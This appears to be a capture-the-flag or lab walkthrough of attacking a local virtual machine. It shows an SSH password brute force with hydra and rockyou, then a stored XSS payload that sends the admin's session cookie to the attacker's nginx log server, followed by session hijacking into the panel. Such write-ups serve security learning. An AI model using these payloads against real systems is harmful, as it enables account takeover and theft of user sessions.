Picking the lowest hanging fruit to crack
- So right now we have 2 attack vector
- SSH
- Web Service
Cracking ssh
For the ssh, we can launch a ssh brute force crack for background job.
root@kali:~# locate rockyou
/usr/share/hashcat/masks/rockyou-1-60.hcmask
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
/usr/share/hashcat/masks/rockyou-4-43200.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-6-864000.hcmask
/usr/share/hashcat/masks/rockyou-7-2592000.hcmask
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/john/rules/rockyou-30000.rule
/usr/share/wordlists/rockyou.txt.gz
root@kali:~# cd /usr/share/wordlists/
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -la
total 136660
drwxr-xr-x 2 root root 4096 Nov 5 19:31 .
drwxr-xr-x 338 root root 12288 Oct 24 23:24 ..
lrwxrwxrwx 1 root root 25 Oct 24 23:14 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Oct 24 23:14 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 41 Oct 24 23:14 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Oct 24 23:14 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 46 Oct 24 23:14 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 41 Oct 24 23:14 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 139921507 Jul 17 02:59 rockyou.txt
lrwxrwxrwx 1 root root 25 Oct 24 23:14 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt
root@kali:/usr/share/wordlists# hydra -v -l root -P /usr/share/wordlists/rockyou.txt -t 3 192.168.56.104 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-05 19:33:07
[DATA] max 3 tasks per 1 server, overall 3 tasks, 14344399 login tries (l:1/p:14344399), ~4781467 tries per task
[DATA] attacking ssh://192.168.56.104:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.104:22
Cracking Web service - xss
Back to our browser, we saw this…
Service recon
In comment section, there is an xss vector.
Lets try <script>alert("xss");</script>
as payload.
Got it.
Cracking Web service - xss - stealing user Credential
We can get the credentials via stealing document.cookie
attack vector.
Add access_log /var/log/nginx.log;
in nginx config file
service nginx start
Lets try our log server.
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0)
Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20
100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh
; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gec
ko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
Success.
Lets inject this sneaky script into our target.
`<script>
var img = document.createElement("img");
img.src = "http://192.168.56.101/?cred="+document.cookie;
document.body.appendChild(img);
</script>`
waita bit for the admin to take the bait..
nginx/ nginx.log
root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0)
Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20
100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh
; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gec
ko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0
) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/pos
t.php?id=2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.p
hp?id=2" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.1 Safari/534.34"
GOT IT.PHPSESSID=nl65c43q2vfjd77ebebv2dgko1
Change our cookies with Cookie Editor, and lets try to get into our panel.
Pwned.